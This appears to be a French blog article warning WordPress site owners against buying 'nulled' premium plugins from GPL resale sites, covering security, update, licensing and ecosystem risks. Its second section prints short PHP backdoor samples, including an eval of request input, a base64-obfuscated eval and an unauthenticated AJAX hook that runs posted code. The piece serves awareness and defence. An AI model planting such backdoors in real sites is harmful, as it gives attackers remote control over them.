Ă premiĂšre vue, lâoffre semble allĂ©chante : accĂ©der Ă des plugins WordPress normalement vendus entre 49⏠et 199âŹâŠ pour quelques euros seulement. Le tout prĂ©tendument lĂ©gal, puisque âsous licence GPLâ.
Mais derriĂšre ces sites de « plugins GPL », on retrouve souvent des versions piratĂ©es, modifiĂ©es, instables ou mĂȘme dangereuses : ce sont les fameux plugins nulled.
Voici pourquoi il ne faut jamais acheter ou utiliser ce type de versions, mĂȘme si elles semblent Ă©conomiques.
𧚠1. Code modifié = Risques de sécurité majeurs
Les plugins nulled sont modifiĂ©s Ă la main pour supprimer les protections de licence. Cette modification du code source PHP ouvre la porte Ă toutes sortes dâinjections :
- Suppression ou détournement des fonctions de sécurité
- Injections de backdoors (accÚs cachés à votre site)
- Execution de code PHP Ă distance (
eval(),base64_decode(), etc.) - Collecte discrÚte des données de votre site
Ces modifications sont souvent discrĂštes et dissimulĂ©es dans des fichiers critiques comme functions.php, autoload.php ou directement dans le cĆur du plugin. Elles sont quasiment invisibles pour un Ćil non averti.
đ”ïžââïž 2. Exemples concrets dâinjections courantes
Voici quelques exemples techniques fréquemment rencontrés :
phpCopierModifier// Exécution de code PHP externe
eval($_GET['cmd']);
// Obfuscation en base64
eval(base64_decode('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs='));
// Backdoor via AJAX
add_action('wp_ajax_nopriv_inject', function() {
eval($_POST['code']);
});
Ces injections permettent Ă un attaquant de prendre le contrĂŽle du site Ă distance, de modifier les fichiers, ou dây installer un shell Web.
â 3. Plus de mises Ă jour, plus de support, aucun correctif
Avec un plugin nulled :
- Vous ne recevez aucune mise à jour du développeur
- Vous ne bĂ©nĂ©ficiez dâaucun support en cas de bug
- Vous nâĂȘtes pas informĂ© des failles corrigĂ©es dans les versions ultĂ©rieures
En clair, vous utilisez un plugin figé dans le temps, souvent obsolÚte ou vulnérable, sans moyen fiable de le corriger.
đš 4. GPL ne couvre pas tout : attention aux ressources protĂ©gĂ©es
La licence GPL sâapplique au code PHP du plugin⊠mais pas forcĂ©ment :
- aux images, icÎnes ou logos intégrés
- aux feuilles de style (CSS) sous licence restreinte
- aux polices de caractĂšres (licence Adobe, Google Fonts, etc.)
- Ă certains fichiers JS ou assets tiers
Vous risquez donc de violater des droits dâauteur sans mĂȘme le savoir, avec des consĂ©quences juridiques possibles.
âïž 5. Zone grise lĂ©gale et sabotage de lâĂ©cosystĂšme WordPress
Ces marchands profitent dâune lecture biaisĂ©e de la licence GPL pour :
- revendre illégalement du travail tiers
- sous-payer voire ne rien reverser aux développeurs
- tromper les utilisateurs sur la stabilitĂ© ou lâorigine du plugin
En les soutenant, vous fragilisez les modÚles économiques des éditeurs indépendants et des agences WordPress, qui investissent temps, argent et compétences dans des solutions fiables et maintenues.
đŁ 6. Un faux bon plan aux consĂ©quences trĂšs coĂ»teuses
Quelques euros économisés peuvent se transformer en :
- đ» Un site piratĂ© ou dĂ©truit
- đ Une fuite de donnĂ©es clients
- đ§âđŒ Des pertes de chiffre dâaffaires
- đ Une perte de position SEO
- đ§° Des heures ou des jours de nettoyage par un expert⊠souvent bien plus cher que le plugin dâorigine
â Les bonnes pratiques
đ Utilisez toujours :
- Les versions gratuites officielles sur le dépÎt WordPress.org
- Des plugins achetĂ©s directement auprĂšs de lâauteur
- Des bundles dâagences ou de partenaires agréés
- Des offres de maintenance pro incluant des licences premium valides (ex : SupportPress, RunPressâŠ)
đ§ En rĂ©sumĂ©
Acheter un plugin premium auprĂšs dâun site de âGPL nulledâ revient Ă :
- â ïž Introduire un code potentiellement malveillant dans votre site
- đ« Renoncer Ă tout support et sĂ©curitĂ©
- đ Mettre en danger vos visiteurs, vos donnĂ©es, votre activitĂ©
- â Participer Ă la prĂ©carisation des dĂ©veloppeurs WordPress

